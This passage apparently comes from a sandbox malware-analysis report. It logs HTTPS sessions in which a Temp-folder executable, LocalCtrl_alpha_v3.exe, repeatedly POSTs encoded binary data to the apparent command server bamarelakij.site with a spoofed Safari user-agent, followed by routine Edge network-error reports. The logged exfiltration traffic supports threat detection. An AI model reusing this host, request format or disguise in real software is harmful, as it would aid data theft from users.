                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf15f6ec51422d-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1593&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1470&delivery_rate=1514522&cwnd=232&unsent_bytes=0&cid=28188d17e05088ac&ts=252&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  28192.168.2.450122104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:48 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 58769
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:48 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 56 e5 00 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 11 f2 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab 5d f5 de 82 ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e 22 2b ab 24 a5 a6 27 23 27 27 17 38 32 33 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd 22 2b ab 24 a5 a6 27 23 27 27 a9 2c 29 28 23 29 23 a9 2b 2b a1 a8 28 2c a9 a5 ab 24 a5 28 25 25 24 ac a8 ab ac ac 23 a7 27 a0 25 a8 a9 a1 a7 24 2d a0 22 21 24 aa a7 ab a7 a9 28 22 2b a0 a7 a4 a8 2b a7 21 24 a3 a6 a4 a2 27 2d a8 2d 26 a0 21 ac 22 a5 ab 2c a3 a9 aa a8 27 a9 a2 a4 27 a4
                                                                                                                                                                  Data Ascii: VR:h6@5Y4`H4(]9119.2."+$'#''823"+$'#'',)(#)#++(,$(%%$#'%$-"!$("++!$'--&!",''
                                                                                                                                                                  2025-01-06 22:18:48 UTC15331OUTData Raw: a2 22 a4 ab 23 a2 a6 a4 a9 a2 a5 2d ab 27 a1 22 2a a4 28 2a 2a a7 2d 2c a7 2d 25 a4 ac a6 a3 a5 ac a4 a5 2c 21 26 aa 29 2b ab 21 25 24 ac 23 25 a1 26 a3 2b 2b a4 a6 a0 22 aa 26 2a 2a 2b 2d a4 a7 a2 a4 28 a6 2b 25 a0 a7 28 a9 a8 a1 22 23 a6 ac 28 a9 28 a3 26 21 a4 a8 2c 2a ab 2a aa 2d a2 29 a3 21 22 2a a1 a4 29 29 2b 29 2a 27 a3 a2 27 2c 2c 29 2a 24 a2 a9 2c a8 23 aa a8 a9 29 a3 aa a8 22 a8 ab a3 2a a3 2c 2a a9 a3 22 ac ab a4 a8 2b a7 a5 a0 21 a0 a4 a0 25 a4 a2 aa 2b ac a1 2d 2c 27 ac 2b a5 28 29 29 a2 a6 ac a0 2b 22 23 22 24 ab a7 a3 a2 a5 a0 26 aa 28 21 24 a7 24 a2 27 a4 24 26 23 25 2d a0 24 2b 2a 25 a4 a8 25 21 a5 2c a7 ac a4 a7 a2 26 a1 a4 a4 a2 a1 25 21 28 2a 2a a0 a9 21 a2 a5 a3 a7 a2 a9 29 22 23 21 a0 a1 28 a7 2a 27 a6 29 2d a7 a3 ab 27 28 27 29 a7
                                                                                                                                                                  Data Ascii: "#-'"*(**-,-%,!&)+!%$#%&++"&**+-(+%("#((&!,**-)!"*))+)*'',,)*$,#)"*,*"+!%+-,'+())+"#"$&(!$$'$&#%-$+*%%!,&%!(**!)"#!(*')-'(')
                                                                                                                                                                  2025-01-06 22:18:48 UTC15331OUTData Raw: 23 a6 a4 24 23 2d 24 a4 22 28 a3 26 a7 2a 24 a1 a8 23 2d 2d a2 24 a4 a2 2c ab 27 27 2d 29 25 a8 26 ab ac a6 2b aa 24 2a 2c 24 23 23 22 2a ac 21 24 22 29 21 29 27 2a 28 26 21 2c 28 2b 23 a1 aa 2b a0 25 a7 ac a7 ab 29 a2 27 23 aa 2c 2a a9 a1 27 a1 a1 a8 25 a7 a9 a4 2a a1 23 2a a3 25 24 23 a8 a1 ac a4 a9 a5 aa a0 2b a9 29 ac a0 a9 ab 2b 25 29 22 27 a7 ac ac a1 a9 ac a7 2d ab 24 29 28 27 a9 21 ab a6 24 aa aa a2 ac aa a3 a7 2c 2b a9 ac a5 26 23 2d a0 aa a8 25 2d 22 2b 21 a2 21 24 24 a3 2c a8 24 2d 2b 25 ab 27 aa a3 26 a9 a0 ac ab a4 a2 24 a0 25 a1 28 a4 a7 24 a7 28 a1 2c a5 27 2b 29 a4 a9 21 a3 aa a0 a2 a6 a9 ac a2 a3 27 28 a8 2c a4 2a 29 a4 a4 a6 2c a7 26 a4 25 ac aa 21 a4 a2 a8 a3 2d a8 aa a0 24 29 ab a6 a5 a8 24 a1 29 24 a5 21 25 2d a8 a8 2c 23 ac 2a 27 21
                                                                                                                                                                  Data Ascii: #$#-$"(&*$#--$,''-)%&+$*,$##"*!$")!)'*(&!,(+#+%)'#,*'%*#*%$#+)+%)"'-$)('!$,+&#-%-"+!!$$,$-+%'&$%($(,'+)!'(,*),&%!-$)$)$!%-,#*'!
                                                                                                                                                                  2025-01-06 22:18:48 UTC12776OUTData Raw: a1 a6 24 ab 26 a4 2b 23 a0 a1 a8 a5 2d 2c 2c 2d 25 a7 a9 a2 27 21 25 24 2d a2 26 a4 2b a7 a1 a0 24 22 27 2d a3 2d a4 26 23 a9 a4 26 2a a9 a0 25 2c 22 21 23 a0 a4 28 24 2b 24 2c ac 24 25 24 2b a6 2b 24 a5 2b a7 a6 ac a7 a3 a3 2b a4 a5 2b 25 aa 2b ac 26 22 23 2a a4 a1 21 a1 2d a5 a9 2b 29 22 29 2a a0 26 a9 2c 23 27 a6 a1 28 26 a3 a7 a3 a9 a2 21 a5 2c a9 24 a9 24 2b 22 2b 22 a5 ab a2 24 27 a4 21 26 28 2a a6 ab a4 a1 a0 a0 a1 2b 23 ab 28 a8 27 a4 aa 2b 26 23 a9 a0 ab 28 a7 a3 22 25 23 a7 a3 2a 2c 22 24 a6 2a 23 ab 29 a2 2b 2d 2c a1 a0 21 25 a1 a5 23 ac 2c 25 a3 a0 24 a5 2a 2c 27 23 26 a4 a4 26 2a a6 21 29 2a a5 a0 a1 2a a6 a7 2b 22 21 26 a1 2b ac 22 2b 26 27 a1 22 2c a0 a0 a4 27 2a a3 a1 a1 29 2d 28 22 2a a7 23 a1 ab 2d ab 2a 24 26 a1 2b a3 29 2a a8 28 a2 21
                                                                                                                                                                  Data Ascii: $&+#-,,-%'!%$-&+$"'--&#&*%,"!#($+$,$%$++$+++%+&"#*!-+)")*&,#'(&!,$$+"+"$'!&(*+#('+&#("%#*,"$*#)+-,!%#,%$*,'#&&*!)**+"!&+"+&'",'*)-("*#-*$&+)*(!
                                                                                                                                                                  2025-01-06 22:18:48 UTC731INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:48 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GVDxB5VZVHqetpeKNDw5gB%2BNCE66cX8oHX25nK5RrwfkaC3A5TiW0phkoFJe2RL7JWSacbTUtLJZu7Hnajwua%2Btg4BLbzlj4UEKabIKuCcEO3dzK8%2Fa2LB%2FPUvhe6V983wK7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf16040dc2727b-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1805&min_rtt=1796&rtt_var=692&sent=25&recv=66&lost=0&retrans=0&sent_bytes=2838&recv_bytes=60015&delivery_rate=1559829&cwnd=234&unsent_bytes=0&cid=22345bb82701df52&ts=620&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  29192.168.2.450123104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:50 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 68839
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:50 UTC15331OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 ac 0c 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 83 86 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 19 98 18 9c 9b 9c d2 35 b7 37 b2 b9 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 e4 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 b9
                                                                                                                                                                  Data Ascii: R!f%@5Ya3`S57%Iz7:6)9*( $=93:!"8628:9`nPS:T):9T<9<77:<9<V767<V9;
                                                                                                                                                                  2025-01-06 22:18:50 UTC15331OUTData Raw: 70 24 f7 7d b1 0f 7e b5 4a 7f 19 ff ff f7 fc b9 f0 a2 f8 dd 7f 06 61 40 f1 55 72 26 62 02 78 fa 57 55 54 49 35 e6 28 7f 7d 77 b4 87 ab 70 b1 8e 05 fd 54 1f 39 f2 69 cd cf 0b 46 a8 00 b1 aa 6c c6 e4 eb 53 7d 57 84 7b ac 76 a0 2b c3 d7 66 6f 41 be 9e a5 a2 a7 c3 3c 24 26 51 5f 6f 0c 0f 7d 3a c3 c1 22 9a 27 52 c3 48 7d d6 26 5d eb bd 17 d8 12 bf d3 1d 75 2d ee ba 09 23 cd a4 13 19 e8 33 bd 96 7d 8d 79 0c 97 72 49 16 84 7b a3 46 11 f9 14 b4 4e a4 d7 b7 fa 97 16 ba cf 62 2b be 8a 93 7d 37 aa 89 46 01 35 e5 45 b6 39 7a 06 20 f9 ce aa 64 f2 aa 91 7d d6 fe ad ea 31 c4 d0 0e 98 43 f8 0b a0 10 76 0a 16 df c3 87 ab ca 22 af 7e 90 fa 7e 1b 27 fc cf bb 00 df ae 12 17 94 fc d3 e9 64 92 f3 48 c1 4d 81 f4 df a2 4c a5 8c 05 20 54 e1 8a 7f 18 b8 a4 c6 86 f7 de 10 15 e5 bf
                                                                                                                                                                  Data Ascii: p$}~Ja@Ur&bxWUTI5(}wpT9iFlS}W{v+foA<$&Q_o}:"'RH}&]u-#3}yrI{FNb+}7F5E9z d}1Cv"~~'dHML T
                                                                                                                                                                  2025-01-06 22:18:50 UTC15331OUTData Raw: 1d 42 ae 54 dd b9 ad 5a b3 a8 c0 9e a6 5a b3 a8 d5 c8 34 19 2d 4c 30 87 12 1f 09 9a da cd 5b 4b d9 bc 1e 38 e7 1a f1 23 8c 50 60 3f b1 58 2f 24 76 95 f6 d4 f8 fd dd 03 0a 5b ca e4 6c 2f d8 71 83 8b d7 75 8b b2 a3 98 cc ef 4d 7d 6e 2c 95 1f d0 f6 47 6b cb ae 41 84 dc 60 f5 25 a9 d2 fb c9 d8 5e 31 9c d2 32 a3 29 c8 f5 45 ca 77 44 82 cf ed d3 08 f1 c4 7a a9 88 f1 c4 0e 83 b4 20 73 33 18 76 25 03 e8 a6 12 c8 25 75 ad 0e af a2 f4 a5 69 55 25 c1 22 f1 25 58 c1 ea 12 78 52 e8 41 00 de ff 09 53 ff 40 f5 da d9 99 f7 1d 70 7f 8f eb 93 3b 54 8d e3 41 7b 6e bb c6 ef 0e fc d7 9f 85 f8 c4 1c 09 6e 95 1a 28 ec 75 31 d4 f0 bc ab 15 e6 8a 89 76 a5 7b e2 40 20 39 e9 08 73 99 c0 01 25 89 0f 9e 45 32 88 84 be ad 54 90 89 2e 28 8c 13 38 c3 9f 58 d3 60 d8 47 76 07 3e 2e c0 6f
                                                                                                                                                                  Data Ascii: BTZZ4-L0[K8#P`?X/$v[l/quM}n,GkA`%^12)EwDz s3v%%uiU%"%XxRAS@p;TA{nn(u1v{@ 9s%E2T.(8X`Gv>.o
                                                                                                                                                                  2025-01-06 22:18:50 UTC15331OUTData Raw: 5a 7f 6e 52 bf 1f 29 f8 f8 8e 8e 51 56 83 cc ef 92 d8 f4 d7 a6 36 bb 9c 86 54 ce bd c6 3d d3 10 13 f5 e1 67 5c 2d b0 86 4c 2a 3d 2f a2 ef 7b 82 a9 03 85 36 74 f5 94 7e 77 f3 8d a0 a0 eb d6 ca a0 75 02 3e e0 c7 20 ae 15 68 b4 d5 bd a9 d3 19 a3 d5 45 46 b2 6f 3a 59 9a 4b 2e f9 7a 68 bb 19 db 13 07 ee 4f cf c6 16 0b 1c b4 55 31 f1 b0 9b 5f ce a0 66 c2 1c f8 08 12 ed 5a 32 08 9b bf 7d 6c 05 5f c0 9c 5b 91 8a e4 8b f8 77 c2 59 de ad b0 6d fe 69 80 3b d5 b8 c5 75 cb 1d fe 1e a7 90 3e c9 fb 59 ad 92 35 6f 11 a6 a5 c5 d2 80 ed e8 e6 63 f2 19 e0 19 0a 20 d3 a3 69 b5 fc 05 91 bb 74 86 be 62 83 c4 5a f3 7f 5f 91 5f c3 3b d5 97 3c 7a fa 30 80 64 6b 8c 5e 17 ce ba 87 72 70 99 66 52 4c fc ac cd 5c 4d c2 37 db 77 c6 db d9 6a 4b 6f e0 75 8f c8 ba 58 82 6d f0 fe a1 59 5d
                                                                                                                                                                  Data Ascii: ZnR)QV6T=g\-L*=/{6t~wu> hEFo:YK.zhOU1_fZ2}l_[wYmi;u>Y5oc itbZ__;<z0dk^rpfRL\M7wjKouXmY]
                                                                                                                                                                  2025-01-06 22:18:50 UTC7515OUTData Raw: 8a e0 e1 ae 07 db 37 f3 79 d4 b0 c9 e0 56 53 78 43 e3 9c 59 7c 79 43 b3 1d cd 14 00 8d 7b bc f0 76 ec 6b e4 e4 32 c5 ca 01 0f 96 de 22 63 7e fe b3 9b d9 ab 36 84 96 3b b9 a7 2d fa 2e 9e b5 51 4e 25 ad 37 cf 8f 33 a6 0e d1 00 c1 f0 7b e0 dc bc c0 75 4c 84 9e d6 9d e3 6a c2 ea cd 24 e4 7c 76 07 dd 01 59 76 ae 7b 38 9a b4 71 86 0d da e0 91 e2 63 b6 c1 fd 8a e1 f6 ba 3e 9e b8 72 a5 2f ae 77 06 a2 80 27 52 7f 12 4a 66 99 59 72 39 c9 39 d9 bb 22 b1 2f 98 f6 72 eb b1 92 4c 2b 7a ee 9f 1d 8a 5c bd 4e 7c 5b b6 71 6e 29 a2 c7 ef 22 d3 25 df b5 b0 5b a9 58 a3 d1 c3 76 30 97 ef 2b 8b 3b 08 d1 bd 15 9f 11 b5 69 cf 6b 3a fb e5 f1 93 8f 7b 43 a2 a3 b1 28 00 b0 b6 e9 5b 3c d1 cb 46 c3 8d d1 cf 79 9a c1 13 5e b5 fc a4 31 61 eb 04 fa 3b 0d 57 04 44 73 d6 49 c6 0d bf 0c e0
                                                                                                                                                                  Data Ascii: 7yVSxCY|yC{vk2"c~6;-.QN%73{uLj$|vYv{8qc>r/w'RJfYr99"/rL+z\N|[qn)"%[Xv0+;ik:{C([<Fy^1a;WDsI
                                                                                                                                                                  2025-01-06 22:18:51 UTC731INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:50 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4oDOeoF4gQj8z98TUZywzhdJ6Nao0zxmhtG26WcXAfzkYBVzsIH4FtfL8GJxUb8cnQDkXwcRZfLFTZLSLHABUHdU%2BW4OwQtIDNvR2tSCVUc0aRvwEC5wYeOh%2BxcO%2B9Gy6g%2Fb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf16121b950ca0-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=1633&rtt_var=924&sent=30&recv=75&lost=0&retrans=0&sent_bytes=2838&recv_bytes=70107&delivery_rate=1788120&cwnd=239&unsent_bytes=0&cid=21e1c55717bc4108&ts=490&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  30192.168.2.450124104.21.80.524438148C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:51 UTC453OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 35
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:18:51 UTC35OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:18:52 UTC726INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:18:52 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkcSrZKgUtwKuQOsCsDnvHxVxXAwCIyVYANb21tv1S9prdeuPtqa644BepEsClvMlDwCeL6ejUZGzjRcboFO1%2BB9equ%2BZEyN0ZA6PTVWiW5FDIgGqE%2Ba5oQHJKisjzSFcoyE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf161a8f9e7cea-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7013&min_rtt=7013&rtt_var=3506&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1124&delivery_rate=117737&cwnd=226&unsent_bytes=0&cid=dc62606c183260c7&ts=362&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  31192.168.2.45012623.44.136.1414435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:19:00 UTC442OUTOPTIONS /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                  Host: bzib.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Origin: https://business.bing.com
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:19:00 UTC332INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.8d872c17.1736201940.b264bf
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  32192.168.2.45012723.206.121.264435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:19:00 UTC430OUTOPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                                                  Host: deff.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Origin: https://assets.msn.com
                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:19:00 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.86f8dc17.1736201940.4c38f2a3
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  33192.168.2.45012923.206.121.264435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:19:00 UTC374OUTPOST /api/report?cat=msn HTTP/1.1
                                                                                                                                                                  Host: deff.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 1002
                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:19:00 UTC1002OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 31 36 37 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 30 2c 22 6d 65 74 68 6f 64 22 3a 22 4f 50 54 49 4f 4e 53 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 33 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 31 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 32 33 2e 34 39 2e 32 35 31 2e 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                                  Data Ascii: [{"age":51675,"body":{"elapsed_time":110,"method":"OPTIONS","phase":"application","protocol":"h3","referrer":"https://ntp.msn.com/","sampling_fraction":0.1,"server_ip":"23.49.251.7","status_code":200,"type":"abandoned"},"type":"network-error","url":"https
                                                                                                                                                                  2025-01-06 22:19:00 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:19:00 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  PMUSER_FORMAT_QS:
                                                                                                                                                                  X-CDN-TraceId: 0.9af8dc17.1736201940.3c21db20
                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                  Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  34192.168.2.45012823.44.136.1414435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:19:00 UTC382OUTPOST /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                  Host: bzib.nelreports.net
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Content-Length: 940
                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
